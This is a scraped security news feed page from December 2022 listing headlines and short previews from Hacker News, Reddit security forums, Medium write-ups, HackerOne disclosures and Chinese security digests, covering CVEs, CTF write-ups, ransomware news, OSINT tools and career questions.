    Article URL: https://www.tenable.com/blog/cve-2022-27518-unauthenticated-rce-in-citrix-adc-and-gateway Comments URL: https://news.ycombinator.com/item?id=33987511 Points: 1 # Comments: 0
  • Open

    Recon Skills and Tips — Learn All About Them at IWCON 2022
    No content preview
    Why and How to Use HTTP Security Headers?
    No content preview
  • Open

    Recon Skills and Tips — Learn All About Them at IWCON 2022
    No content preview
    Why and How to Use HTTP Security Headers?
    No content preview
  • Open

    Recon Skills and Tips — Learn All About Them at IWCON 2022
    No content preview
    Why and How to Use HTTP Security Headers?
    No content preview
  • Open

    SecWiki News 2022-12-14 Review
    SPEL注入流程分析及CTF中如何使用 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-14 Review
    SPEL注入流程分析及CTF中如何使用 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Unusual Cache Poisoning between Akamai and S3 buckets
    submitted by /u/albinowax [link] [comments]
    Technical Review: A Deep Analysis of the Dirty Pipe Vulnerability
    submitted by /u/gfdgfbal [link] [comments]
    Hacking the MBTA CharlieCard from 2008 to Present
    submitted by /u/_zio_pane [link] [comments]
    FRESH from Black Hat EU: Dirty Vanity, the windows-fork based injection method is public
    submitted by /u/LezG00 [link] [comments]
    Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.
    submitted by /u/boutnaru [link] [comments]
    Vulnerabilities found on Arcadyan Routers
    Finally (!!!) I was able to make this public. It ain’t much but it is honest work. submitted by /u/asherdl02 [link] [comments]
  • Open

    Announcing OSV-Scanner: Vulnerability Scanner for Open Source
    Article URL: https://security.googleblog.com/2022/12/announcing-osv-scanner-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=33984439 Points: 1 # Comments: 0
    OSV-Scanner| Vulnerability Scanner for Open Source from Google
    Article URL: https://osv.dev/ Comments URL: https://news.ycombinator.com/item?id=33982534 Points: 2 # Comments: 2
  • Open

    Bypassing CORTEX XDR — A Case Study in the Power of Simplicity
    To start, I would like to introduce myself. My name is Ben Tamam, 25 years old. I’m a Red Teamer and a Team Lead of the offensive… Continue reading on Medium »
  • Open

    工信部发布《工业和信息化领域数据安全管理办法(试行)》
    《管理办法》作为工业和信息化领域数据安全管理顶层制度文件,共八章四十二条,重点解决工业和信息化领域数据安全“谁来管、管什么、怎么管”的问题。
    《电力行业网络安全等级保护管理办法》发布
    管理办法》共计六章二十八条,适用于电力企业在我国境内建设、运营、维护、使用网络(除核安全外),开展网络安全等级保护工作。
    FreeBuf早报 | 日本新版国家安全战略引入主动网络防御原则;瑞典两个城市遭受网络攻击
    LockBit 黑客组织宣布从加州财政部盗取近 76GB 数据。
    LockBit 黑客组织又“出手”了,加州财政部成为受害者
    目前,加州网络安全情报中心(Cal-CSIC)已经开始着手调查攻击事件。
    继公布开源计划之后,谷歌又推出最大的开源漏洞数据库
    谷歌宣布开源OSV-Scanner,该开源漏洞扫描仪可访问各种项目的漏洞信息,加强软件供应链安全。

  • Open

    A New LOLBin? Using the Windows Type Command to Upload/Download Files
    The forgotten functionality between the Type command and WebDAV Continue reading on Medium »
    Buffer Overflow — Spiking
    Buffer overflow spiking is a form of computer security attack that involves feeding more data to a buffer or temporary storage region than… Continue reading on Medium »
    Buffer Overflow — Spiking
    Buffer overflow spiking is a form of computer security attack that involves feeding more data to a buffer or temporary storage region than… Continue reading on Medium »
    Certified Red Team Operator (CRTO) Review
    The Certified Red Team Operator (CRTO) course is an offering from Zero Point Security which aims to teach “the basic principles, tools and… Continue reading on Medium »
    CVE-2022–42889 Text4Shell Vulnerability
    Apache Common Text Continue reading on MII Cyber Security Consulting Services »
    Finding the Gap: How Curiosity and Creativity Drives Threat Detection
    Let the Real World be your Lab with Mitre ATT&CK, Atomic Red Team, and Sigma Continue reading on Medium »
  • Open

    Penetration testing, or pentesting, is the process of simulating a cyber attacks
    On a computer system, network, or web application to test its defenses and identify vulnerabilities. This is often done by ethical hackers… Continue reading on Medium »
    Explaining Vulnerabilities : Broken Access Control
    What is Broken Access Control? Continue reading on Medium »
    Lack of Rate Limiting
    Recently found a RL vulnerability and wanted to share Continue reading on Medium »
    Doing it the researcher’s way: How I Managed to Get SSTI (Server Side Template Injection) which…
    Hello everyone, Continue reading on Medium »
    IDOR allows updating user profiles, leading to full account takeover. | Part 02
    Hi there, amazing hackers and security enthusiasts! Today, I want to share something really important with you. I’m sure you’ll find it… Continue reading on Medium »
    Getting Started With 5 Bugs part(1)
    In today’s write-up I’m going to explain the first bug of this series to get you started in bug bounties Continue reading on Medium »
    Hacking server using SSTI
    These days we mostly witness website with more of dynamic content than the static content. There are several ways to achieve the mentioned… Continue reading on Medium »
    SUBDOMAIN ENUMERATION
    Subdomain enumeration is the process of identifying all subdomains for a  given domain. This can be useful for a variety of purposes, such… Continue reading on Medium »
    Announcing the launch of Gametree Bug Bounty Program
    Continue reading on Gametree.gt »
  • Open

    Raytheon vs Northrop Grumman vs General Dynamic
    I got 3 offers as new grad. I wonder which one is better for career growth? They kinda similiar in some way except salary. And I will get top secret at Northrop Grumman. submitted by /u/ILikeNuke112 [link] [comments]
    Do corporate IT policies typically allow USB webcams?
    The regular built-in laptop webcams (even business class laptops) are quite poor in quality, to say the least. I'm curious how corporate IT manages this. Is everyone, at corporations big and small, stuck with terrible, low-res video for their Teams calls? submitted by /u/icysandstone [link] [comments]
    PHP execution disabled, now things won't work
    Hi, followed malcare.com 's Disable PHP Execution & Directory Browsing For WordPress Security (malcare.com) and now when I upload images for wordpress posts, it shows like this: https://i.imgur.com/nRnVkqv.png https://imgur.com/Q4bz1MB But when I delete the .htaccess file from wp-uploads folder, the images will start working as those should. Disabling php execution is necessary nowadays but how do I bypass? submitted by /u/yoyobono [link] [comments]
    Retention of files in Windows Server.
    Hello, I need your help in a very urgent matter. I implemented this for retention of files on my windows server : https://learn.microsoft.com/en-us/windows-server/identity/solution-guides/deploy-implementing-retention-of-information-on-file-servers--demonstration-steps-?tabs=gui And it worked perfectly. But, I want to do retention by tag not by path. I think it might be doable in the classification management but I'm not quite sure. Did anyone try this? Or did a retention of files in a windows server? Your help is so appreciated. Thank you so much in advance. submitted by /u/lenaposts [link] [comments]
  • Open

    apk.sh makes reverse engineering Android apps easier, automating some repetitive tasks like pulling, decoding, rebuilding and patching an APK.
    submitted by /u/FipoKa [link] [comments]
    Sandworm.JS - dynamically analyses over 2M javascript packages to offer zero day, real time protection against malicious scripts.
    submitted by /u/sculabobone [link] [comments]
    A Deep Dive into BianLian Ransomware [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    AWS ECR Public Vulnerability
    submitted by /u/Gallus [link] [comments]
    A Server Side Request Forgery protection library for Golang
    submitted by /u/nibblesec [link] [comments]
    Critical Citrix ADC Bug Exploited in the Wild
    submitted by /u/YogiBerra88888 [link] [comments]
    An Open Source tool for Fixing the Accidental Public GitHub Repo
    submitted by /u/amirshk [link] [comments]
    Precious Gemstones: The New Generation of Kerberos Attacks
    submitted by /u/0xdea [link] [comments]
    Exploiting CVE-2022-42703 - Bringing back the stack attack
    submitted by /u/boutnaru [link] [comments]
  • Open

    Pivoting
    No content preview
    Advent of Cyber 2022 [Day 14]-Packet Analysis | Simply having a wonderful pcap time — Simple Write…
    No content preview
    Advent of Cyber 2022 [Day 12]-Malware Analysis Forensic McBlue to the REVscue! Write up
    No content preview
    Windows LNK File Analysis in Forensic IT Reviews
    No content preview
    Directory Payload List via PayloadBox
    No content preview
    SQL Injection Payload List
    PayloadBox Continue reading on InfoSec Write-ups »
    XML External Entity (XXE) Injection Payload List
    No content preview
    Write-up: DOM XSS in innerHTML sink using source location.search @ PortSwigger Academy
    No content preview
  • Open

    Pivoting
    No content preview
    Advent of Cyber 2022 [Day 14]-Packet Analysis | Simply having a wonderful pcap time — Simple Write…
    No content preview
    Advent of Cyber 2022 [Day 12]-Malware Analysis Forensic McBlue to the REVscue! Write up
    No content preview
    Windows LNK File Analysis in Forensic IT Reviews
    No content preview
    Directory Payload List via PayloadBox
    No content preview
    SQL Injection Payload List
    PayloadBox Continue reading on InfoSec Write-ups »
    XML External Entity (XXE) Injection Payload List
    No content preview
    Write-up: DOM XSS in innerHTML sink using source location.search @ PortSwigger Academy
    No content preview
  • Open

    Pivoting
    No content preview
    Advent of Cyber 2022 [Day 14]-Packet Analysis | Simply having a wonderful pcap time — Simple Write…
    No content preview
    Advent of Cyber 2022 [Day 12]-Malware Analysis Forensic McBlue to the REVscue! Write up
    No content preview
    Windows LNK File Analysis in Forensic IT Reviews
    No content preview
    Directory Payload List via PayloadBox
    No content preview
    SQL Injection Payload List
    PayloadBox Continue reading on InfoSec Write-ups »
    XML External Entity (XXE) Injection Payload List
    No content preview
    Write-up: DOM XSS in innerHTML sink using source location.search @ PortSwigger Academy
    No content preview
  • Open

    AWS ECR Public Vulnerability
    Article URL: https://blog.lightspin.io/aws-ecr-public-vulnerability Comments URL: https://news.ycombinator.com/item?id=33976053 Points: 2 # Comments: 0
  • Open

    Retrieving Carrier Name from Phone Number in Python: A Step-by-Step Guide
    To retrieve the carrier name from a phone number using the phonenumbers library in Python, you can use the CarrierMapper.name_for_number()… Continue reading on Medium »
    Rabbit Hole Contract by Hacktoria — A Complete Walkthrough
    This is a special contract, which was launched on one year anniversary of hacktoria.com. So, congratulations Hacktoria and all it’s active… Continue reading on System Weakness »
    Rabbit Hole Writeup
    Special contract celebrating Hacktoria.com 1-Year anniversary. Continue reading on The Sleuth Sheet »
    Guide to your first Trace Labs CTF
    Why not use your OSINT skills for a good cause? Continue reading on Medium »
    Поиск по интернету вещей, IP, MAC, доменам и поддоменам.
    Spider Foot — автоматизированный OSINT-сервис, специализирующийся на исследовании сайтов, доменных имен и IP-адресов. Сервис, как и… Continue reading on Medium »
  • Open

    Attacker can smuggle a malicious domain in a URI object.
    Ruby disclosed a bug submitted by djspinmonkey: https://hackerone.com/reports/156615
    DoS via markdown API from unauthenticated user
    GitHub disclosed a bug submitted by legit-security: https://hackerone.com/reports/1619604 - Bounty: $4000
  • Open

    15 Episodes/Movies 2022 From real-debrid.com
    submitted by /u/mingaminga [link] [comments]
  • Open

    SecWiki News 2022-12-13 Review
    uuWAF: 免费、高性能、高扩展开源WAF by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-13 Review
    uuWAF: 免费、高性能、高扩展开源WAF by ourren 更多最新文章,请访问SecWiki
  • Open

    Java-IO-小记
    Java的核心库java.io提供了全面的IO接口,本文从字节流、字符流、转换流等方面展开详细讲解。
    锁定明早9点 | CIS 2022网安多维时空即将开启
    锁定明早9点半,我们一起云入席、云参会、云交流。
    人工智能机器人ChatGPT爆火没多久,管理规定就出台了
    《互联网信息服务深度合成管理规定》自2023年1月10日起施行。
    FreeBuf早报 | 三大运营商:将删除用户行程码数据;印度外交部泄露外籍人士护照信息
    未来五年,全球数据规模将以21.2%的年复合增长率发展,2026年,全球数据量将高达216ZB。
    记一次某微代码审计过程
    记一次某微代码审计过程
    比利时一城市遭受勒索软件袭击,全市通信中断
    上周比利时安特卫普市遭受网络攻击,Play 勒索软件团伙随即高调宣称对此事负责。
    Royal勒索软件攻击瞄准美国医疗系统
    Royal勒索软件对美国医疗保健系统发起攻击,赎金要求从25万美元到200万美元不等。
    三大运营商:同步删除用户行程相关数据
    中国移动、中国联通、中国电信表示,自12月13日0时“通信行程卡”服务下线后,同步删除用户行程相关数据,依法保障个人信息安全。
    印度外交部泄露外籍人士护照详细信息
    印度外交部负责对外联络海外印度侨民的平台Global Pravasi Rishta Portal泄露了敏感数据,包括个人姓名和护照详细信息。
    如何使用Legitify保护你的GitHub组织资产安全
    Legitify可以帮助广大研究人员或IT技术人员轻松检测和缓解GitHub资产中潜在的各种错误配置、安全问题以及合规性等问题。
    如何使用r4ven检查自己的电子设备是否泄漏了IP及GPS信息
    r4ven是一款功能强大的用户敏感信息安全检测工具,该工具可以托管一个伪造的网站,而这个网站使用了一个iframe来显示一个合法网站的信息。
    scscanner:一款功能强大的大规模状态码扫描工具
    scscanner是一款功能强大的大规模状态码扫描工具,该工具可以帮助广大研究人员从一个URL列表文件中批量读取目标网站的状态码响应信息。
  • Open

    Fuzzing the Shield: CVE-2022–24548
    Author: Daejin Lee, Seunghoe Kim, Donguk Kim, Eugene Jang Continue reading on S2W BLOG »
  • Open

    Fuzzing the Shield: CVE-2022–24548
    Author: Daejin Lee, Seunghoe Kim, Donguk Kim, Eugene Jang Continue reading on S2W BLOG »

  • Open

    BlackBird — Osint Tool
    Blackbird é uma ferramenta OSINT para procurar contas por nome de usuário em mais de 574 redes sociais. Continue reading on Medium »
    Terrorist Smugglers Writeup
    This contract needs to be off the books. Continue reading on The Sleuth Sheet »
    OSINT — Ищем владельца банковской карты.
    Проверка по номеру кредитной карты: Continue reading on Medium »
    OPEN-SOURCE INTELLIGENCE [OSINT]
    OSINT, or Open-Source Intelligence, refers to the practice of collecting and analyzing information from publicly available sources. This… Continue reading on Medium »
    OPEN-SOURCE INTELLIGENCE [OSINT]
    OSINT, or Open-Source Intelligence, refers to the practice of collecting and analyzing information from publicly available sources. This… Continue reading on Medium »
  • Open

    CVE-2019–6238: Apple XAR directory traversal vulnerability
    With the security update released in 2019, Apple fixed a directory traversal vulnerability in XAR. Continue reading on Medium »
    PII data exfiltration within minutes
    Hello Everyone, Continue reading on Medium »
    Using Linux effectively (for cyber sec)
    Intro Continue reading on Medium »
    What is CIA Triad & Why is it important?
    Hello everyone, Continue reading on Medium »
    Portswigger Lab: JWT authentication bypass via algorithm confusion with no exposed key, a slightly…
    , or how I learned the importance of RTFM yet again Continue reading on InfoSec Write-ups »
    hytfuy
    auyfvjh Continue reading on Medium »
    Why Ethical Hackers Should Learn How to Program
    Understanding the basics of coding can give ethical hackers a major advantage in their work. Continue reading on The Gray Area »
  • Open

    A New MacOS Persistence and Deception Technique: Default Application Hijacking
    By Gordon Long (@ethicalhax) Continue reading on Medium »
    AWS OIDC — EKS Abuse
    Hi readers, here we will be looking into how can we allow Kubernetes to perform certain tasks in aws. Continue reading on Medium »
    Using Linux effectively (for cyber sec)
    Intro Continue reading on Medium »
    ECPPTv2 Exam Review
    Hola, I would like to share my experience on ECPPTv2 Exam and give some tips and resources that i learned. I passed the exam on 22nd… Continue reading on MII Cyber Security Consulting Services »
  • Open

    Link-shortener bypass (regression on fix for #1032610)
    Twitter disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1421345 - Bounty: $560
    cd=false (DNSSEC) not respected in DNS over HTTPS JSON requests
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1724464 - Bounty: $250
  • Open

    A Year Later, That Brutal Log4j Vulnerability Is Still Lurking
    Article URL: https://www.wired.com/story/log4j-log4shell-one-year-later/ Comments URL: https://news.ycombinator.com/item?id=33957395 Points: 4 # Comments: 0
  • Open

    SecWiki News 2022-12-12 Review
    针对释放后重用漏洞的自动化分析和修复 by ourren Pentesting MSSQL - Microsoft SQL Server by 路人甲 软件开发安全应用实践中的十个误区 by ourren Shell中的幽灵王者—JAVAWEB 内存马 by ourren SecWiki周刊(第458期) by ourren 通过PDF文件信息进行攻击溯源 by ourren [HTB] Seal Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-12 Review
    针对释放后重用漏洞的自动化分析和修复 by ourren Pentesting MSSQL - Microsoft SQL Server by 路人甲 软件开发安全应用实践中的十个误区 by ourren Shell中的幽灵王者—JAVAWEB 内存马 by ourren SecWiki周刊(第458期) by ourren 通过PDF文件信息进行攻击溯源 by ourren [HTB] Seal Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    What does AskNetsec think about my threat hunter learning path?
    Hi r/AskNetsec, I've recently fallen down the rabbit hole of threat hunting: there's a business need for it at my organization, and more importantly what I'm learning is incredibly interesting and I love the investigative process/detective work. In short, the intrinsic motivation is high and I see myself doing this for a long time. I'd like to share some resources I'm leveraging to help me begin my journey, and I would very much appreciate a critique of my approach: Windows Internals: System architecture, processes, threads, memory management, and more, Part 1 (Developer Reference) to understand and interpret endpoint activity. Must Learn KQL: Essential Learning for the Cloud-focused Data Scientist to efficiently comb through data for my hypotheses. Learn Azure Sentinel: Integrate Azure security with artificial intelligence to build secure cloud systems to understand the basics of our SIEM. Microsoft Sentinel in Action: Architect, design, implement, and operate Microsoft Sentinel as the core of your security solutions for a more advanced understanding of our SIEM. Microsoft Security Operations Analyst Exam Ref SC-200 Certification Guide: Manage, monitor, and respond to threats using Microsoft Security Stack for securing IT systems to expand my scope for managing threats within the Microsoft suite. Where should I focus my attention first? What blogs/podcasts should I subscribe to to stay up-to-date on the latest attacks and how they work? Are there any important information sources I'm missing? At work, I'm in the process of understanding business requirements, identifying crown jewels, revealing where we do and do not have visibility, defining a baseline/what is "normal," etc., etc. Thanks in advance for your guidance! submitted by /u/4alloween [link] [comments]
    Security Assesment of application/server setup
    Hi, How do you conduct a security assessment of new software? For example, our HR department what to purchase a new HR tool. Righ now we are testing it and I want to conduct a security assessment of this tool. My checklist: 1) Check the vendor's security certifications (SOC2, ISO, etc.); 2) Check server settings and configuration (not sure how to do this, but something related to: if there is something public, scan for vulnerabilities etc); If the server is on the client side, so back to point 1. 3) Check roles (check who has what access in this software and who has access to sensitive information, such as salaries etc); 4) Check internal settings related to software; Maybe there are some questionnaires? submitted by /u/athanielx [link] [comments]
  • Open

    宽字节注入详细分析
    宽字节注入mysql默认是GBK编码,BGK汉字编码,两个字节代表一个汉字,一个字节代表一个英文或者数字那么,两个字节就是宽字节,一个字节就是窄字节漏洞出现原因mysql默
    记一篇TrickBot银行木马攻击溯源
    经过一系列的排查和溯源,确定本次 攻击路径 是通过 **NETGEAR** (美国网件公司) 生产的路由器的 历史漏洞 打进来的。
    FreeBuf早报 | 太平洋某岛国疑遭勒索攻击断网一月;Log4j一年后许多公司仍未打补丁
    在Apache软件基金会去年11月披露Log4j漏洞一年后,仍然有很多系统没有针对该漏洞打补丁。
    行程卡下线,健康码将退出舞台,我们的数据该如何处理?
    那些曾经采集的,海量的用户数据该怎么办?
    移动互联网应用程序(App)安全认证获取及实践
    近期有很多公司及安全从业者咨询CCRC的移动互联网应用程序(App)安全认证,包括认证介绍、准备工作、注意事项、认证周期、好不好过等。
    Python 恶意软件 AndroxGh0st 开始窃取 AWS 密钥
    AndroxGh0st 主要从暴露的 .env 文件中扫描并解析 Laravel 应用程序配置数据中的各种密钥。
    在披露Log4Shell一年后,大多数公司仍暴露在攻击之下
    虽然公开报道的涉及该漏洞的攻击比预期的要少,但近四分之三的企业仍然暴露在该漏洞之下。
    思科爆出严重漏洞,更新补丁明年一月才能发布!
    远程攻击者可能会利用该漏洞导致远程代码执行或拒绝服务(DoS)情况。
    Pwn2Own 2022闭幕,参赛者累计获得近百万美元奖金
    来自14个国家和地区的36支参赛队伍总共斩获了98万9750美元奖金。
    "法海"开箱详解——新一代的内网互联网产品
    法海的组网功能,可以把单台设备变成分布式设备,对于不同的网段定制路由节点,满足sdp的高可配方案,不仅把网络分摊功能化,还分摊了价格和性能成本。
    溯源专题 | 通过PE中PDB路径信息进行溯源
    PDB(Program Data Base),即程序数据库文件,是Microsoft Visual Studio编译链接时生成的文件,存储了VS调试程序时所需要的基本信息,如何通过PDB对攻击者溯源?
    溯源专题 | 通过PDF文件信息进行攻击溯源
    发现攻击者的PDF中不为人知的信息,将会对我们的溯源工作起到很大帮助!
  • Open

    Is there any encryption that logs the computername/username of the system trying to access a hard drive
    One of our clients has sent an external hard drive containing some IP to one of their subsidiaries and now they suspect that there was probably some data leakage. They have asked us if it is possible to figure out if data was copied to any system. They are also checking if the disk was encrypted before sending and if so, is it possible to know who tried to access it. I have responded with the following --- In such a case we can get the following data 1. If any data was edited. 2. To the extent possible, if any data was deleted. Any evidence of data copying from the hard drive may be present on the laptop(s) from which the data copying was done. Getting this data will only be possible if the laptop is available for forensic analysis. --- I am pretty sure this looks ok, but would like confirmation from my fellow forensicators. Also for encryption, I am pretty sure that bitlocker or veracrypt do not do this, but are there any other FDE which logs the name/date of the machine that tries to access it? submitted by /u/indianadmin [link] [comments]
  • Open

    Precious Gemstones: The New Generation of Kerberos Attacks
    Unit 42 researchers show new methods to improve detection of a next-gen line of Kerberos attacks, which allow attackers to modify Kerberos tickets to maintain privileged access. The post Precious Gemstones: The New Generation of Kerberos Attacks appeared first on Unit 42.
  • Open

    ‍IW Weekly #37: ChatGPT for Pentesting, Hacking Govt.
    No content preview
    Portswigger Lab: JWT authentication bypass via algorithm confusion with no exposed key, a slightly…
    , or how I learned the importance of RTFM yet again Continue reading on InfoSec Write-ups »
    Write-up: SQL injection with filter bypass via XML encoding @ PortSwigger Academy
    No content preview
    TryHackMe ultraTech CTF
    No content preview
    Advent of Cyber 2022 [Day 11]-Memory Forensics-Not all gifts are nice Write up
    No content preview
    Lian_Yu — TryHackMe Writeup by Karthikeyan
    No content preview
    Forensics —Writeup
    No content preview
    Advent of Cyber 2022 [Day 7]-Cyber Chef Maldocs roasting on an open fire Writeup by Karthikeyan…
    No content preview
    Advent of Cyber 2022 [Day5] Email Analysis — It’s beginning to look a lot like phishing by…
    No content preview
    Advent of Cyber Day 2~ Log Analysis Santa’s Naughty & Nice Log
    No content preview
  • Open

    ‍IW Weekly #37: ChatGPT for Pentesting, Hacking Govt.
    No content preview
    Portswigger Lab: JWT authentication bypass via algorithm confusion with no exposed key, a slightly…
    , or how I learned the importance of RTFM yet again Continue reading on InfoSec Write-ups »
    Write-up: SQL injection with filter bypass via XML encoding @ PortSwigger Academy
    No content preview
    TryHackMe ultraTech CTF
    No content preview
    Advent of Cyber 2022 [Day 11]-Memory Forensics-Not all gifts are nice Write up
    No content preview
    Lian_Yu — TryHackMe Writeup by Karthikeyan
    No content preview
    Forensics —Writeup
    No content preview
    Advent of Cyber 2022 [Day 7]-Cyber Chef Maldocs roasting on an open fire Writeup by Karthikeyan…
    No content preview
    Advent of Cyber 2022 [Day5] Email Analysis — It’s beginning to look a lot like phishing by…
    No content preview
    Advent of Cyber Day 2~ Log Analysis Santa’s Naughty & Nice Log
    No content preview
  • Open

    ‍IW Weekly #37: ChatGPT for Pentesting, Hacking Govt.
    No content preview
    Portswigger Lab: JWT authentication bypass via algorithm confusion with no exposed key, a slightly…
    , or how I learned the importance of RTFM yet again Continue reading on InfoSec Write-ups »
    Write-up: SQL injection with filter bypass via XML encoding @ PortSwigger Academy
    No content preview
    TryHackMe ultraTech CTF
    No content preview
    Advent of Cyber 2022 [Day 11]-Memory Forensics-Not all gifts are nice Write up
    No content preview
    Lian_Yu — TryHackMe Writeup by Karthikeyan
    No content preview
    Forensics —Writeup
    No content preview
    Advent of Cyber 2022 [Day 7]-Cyber Chef Maldocs roasting on an open fire Writeup by Karthikeyan…
    No content preview
    Advent of Cyber 2022 [Day5] Email Analysis — It’s beginning to look a lot like phishing by…
    No content preview
    Advent of Cyber Day 2~ Log Analysis Santa’s Naughty & Nice Log
    No content preview
  • Open

    Finding JIT Optimizer Bugs using SMT Solvers and Fuzzing
    submitted by /u/surrealisticpillow12 [link] [comments]
    IATelligence is a Python script that will extract the IAT of a PE file and request GPT to get more information about the API and the ATT&CK matrix related
    submitted by /u/boutnaru [link] [comments]
  • Open

    What is Elon Musk’s X App?
    Elon Musk has been in many headlines this year for a multitude of different reasons. Continue reading on Bitcoin News Today & Gambling News »
  • Open

    Wi-Fi Legacy Security Mechanisms
    submitted by /u/tbhaxor [link] [comments]

  • Open

    GraphQL Exploitation Techniques | Fintech Bug Bounty — Part 2
    This article is the 2nd part of the “Fintech Bug Bounty” series. Continue reading on Medium »
    Mobile Bug Bounty Hunting? Enter BLE
    If you are hunting mobile bug bounties you must know by now how difficult it can be to find new kind of vulnerabilities. Common… Continue reading on Medium »
    The Application Penetration Testing Process: A checklist for every engagement
    This article delivers an overview of application penetration tests and can be utilized as a static reference to stay on track during… Continue reading on InfoSec Write-ups »
    Finding URLs (cyber sec)
    Overview Continue reading on Medium »
    IDOR + PII Leakage
    Hello Hunters!! Continue reading on Medium »
    Parameter Tampering Bug ₹3999 -> 3:
    This is my second parameter tampering bug. I Reported the bug to the company in 22–02–2022 but still now they don’t fix this. So here I… Continue reading on Medium »
    How “I hacked the Dutch government and got the lousy t-shirt”
    Hello everyone, This is my first write-up. In this write-up, I will try to explain how I was able to find 6 vulnerabilities in the Dutch… Continue reading on Medium »
    CIA triad and CVSS 3.0 | A complete guide
    A about guide to CIA triad and CVSS 3.0. Continue reading on InfoSec Write-ups »
    Cybersecurity Resources You Need to Boost Your Knowledge
    Nothing indicates that this will change anytime soon in the world of cybersecurity. Continue reading on Bug Zero »
  • Open

    How to become lead security managment?
    Hi, Long story short, I am rather interested in what courses you could recommend in this direction and to be more specifc, I am interested perhaps more in the direction of "come to the company and set up cybersecurity from scratch": more about administrative functions, probably something similar to auditing or consultation. I also wonder if you could advise something about the development of soft skills. I often work in pairs with team leaders or CISOs, but they do all the communication stuff while it's difficult for me to do any verbal interactions with other people and it prevents me from taking on additional responsibility. I would like to improve my knowledge in the section "infosec" and "soft skills". What could you advise? submitted by /u/athanielx [link] [comments]
    Best ways to monitor web proxy logs
    Hi to everyone, What are the best ways for monitoring web proxy logs? How to detect suspicious URLs, top level domains, etc. thanks to web proxy logs analysis? I've thought about python scripting to parse log files and analyze them but idk if i'ts the best method for this task and if there are some better approaches. Thak you in advance for your answers :) submitted by /u/0xOfenomeno [link] [comments]
    Wireless keyboard and mouse question
    Hello! I was wondering if you fine people at netsec could help explain whether the Logitech MK850 wireless keyboard and mouse combo, linked here has the potential for carrying any viruses or malware that could be given to the MacBook. I read that keyboards and mice if they are programmable can have viruses or malware on them? So just wasn’t sure, thank you! submitted by /u/Normal-Question-1994 [link] [comments]
    HTM email attachment
    I received an htm attachment in my office mail box. I want to analyze the file. It is mostly I think HTML smuggling. It is from icloud email domain. Want to know how to get this in isolated env and check the hash file in VT and other places? submitted by /u/sakhik2014 [link] [comments]
    Phone hacked and need help
    My phone may be compromised and I’m being followed everywhere I go. I am trying to hire a IT personal to assist me with locating the person or APP. Any recommendations would be helpful? Thank you submitted by /u/bellarain1996 [link] [comments]
    Is this 2FA extension safe?
    And if not is there a SAFE 2FA app or extension on laptop? Authenticator submitted by /u/Exotic_Insurance_969 [link] [comments]
    How to best set myself up for success in getting a cyber security internship?
    Hi! Im a third year college student studying Information Science. I just recently changed my field of study though, as my freshman and sophomore year I was a Public Health major. I’ve come to really love learning network fundamentals and cyber security and have been gaining knowledge on what I need to do in order to pursue a career in this field. I currently work as an IT Held Desk student in a major department on my campus. I know the basics of Python and I’ve been learning linux, bash scripting, and have really enjoyed doing beginner CTFs. Ive also been studying Net+ and Sec+ resources. Im not sure if I want to take the exam yet but I know that I know that the information and resources provided for studying are very useful and relevant. I want to participate in an internship because I know that best way to learn is through hands on experience, but due to my transition and me not having any relevant course work I’m wondering how likely am I to even get offered a position. I know that not everyone is looking for a candidate with the most technical skills and that soft skills are a thing too, so what would be the best way to highlight that in my resume? I was wondering if I could get any tips on good ways to structure my resume, what other resources I need to be looking into in order to show that Im a good candidate, and any other relevant advice. Thank you! Edit: Added more info submitted by /u/faversace [link] [comments]
  • Open

    DATA BASES #01
    Eaí já teve seu CPF consultado hoje? Talvez? Continue reading on Medium »
    Telegram… TON… OSINT!
    We continue the topic started in the previous message… Continue reading on Medium »
    Maltego OSINT Lab for Keeber Challenge in Secure, Private and Non-Attribution Kasm Workspace
    Maltego OSINT Linux Workspace used for Keeber Challenge from #NahamCon CTF 2022 from Tech Raj (https://youtu.be/06BhA67BhR0) covering… Continue reading on Medium »
    SPY NEWS: 2022 — Week 49
    Summary of the espionage-related news stories for the Week 49 ( December 4–10) of 2022. Continue reading on Medium »
    Telegram… TON… sale of nicknames and phone numbers… Where is the anonymity?
    I am asked questions about how the identification of Telegram users will now take place … After all, Durov, it’s scary to say, introduced… Continue reading on Medium »
  • Open

    Loading unsigned Windows drivers without reboot
    submitted by /u/dmchell [link] [comments]
    Detecting heap memory pitfalls, step by step and using custom taint analysis to detect heap security issues
    submitted by /u/CoolerVoid [link] [comments]
    Free to enroll, a red teaming course
    Great course here, goes into C2 and other interesting red teaming aspects. https://taggartinstitute.org/p/responsible-red-teaming submitted by /u/volgarixon [link] [comments]
  • Open

    Finding JIT Optimizer Bugs Using SMT Solvers and Fuzzing
    Article URL: https://www.pypy.org/posts/2022/12/jit-bug-finding-smt-fuzzing.html Comments URL: https://news.ycombinator.com/item?id=33946899 Points: 2 # Comments: 0
  • Open

    Detecting heap memory pitfalls
    submitted by /u/CoolerVoid [link] [comments]
    Fuzzing ping(8)…and finding a 24 year old bug
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-12-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    TryHackMe | Advent of Cyber Part 2
    Hi there! In this article, we’ll continue “Advent of Cyber 2022” learning path in TryHackMe together. Continue reading on Medium »
    CIA triad and CVSS 3.0 | A complete guide
    A about guide to CIA triad and CVSS 3.0. Continue reading on InfoSec Write-ups »
  • Open

    GitHub Actions Vulnerability – Artifact Poisoning
    Article URL: https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust Comments URL: https://news.ycombinator.com/item?id=33941780 Points: 2 # Comments: 0
  • Open

    Reading memory values in IDA
    Maybe somebody can help here. More in SO question https://stackoverflow.com/questions/74757178/get-memory-rom-prom-values-from-ida-disassembler submitted by /u/marcinguy [link] [comments]
  • Open

    Exploiting CVE-2022-42703 – Bringing back the stack attack
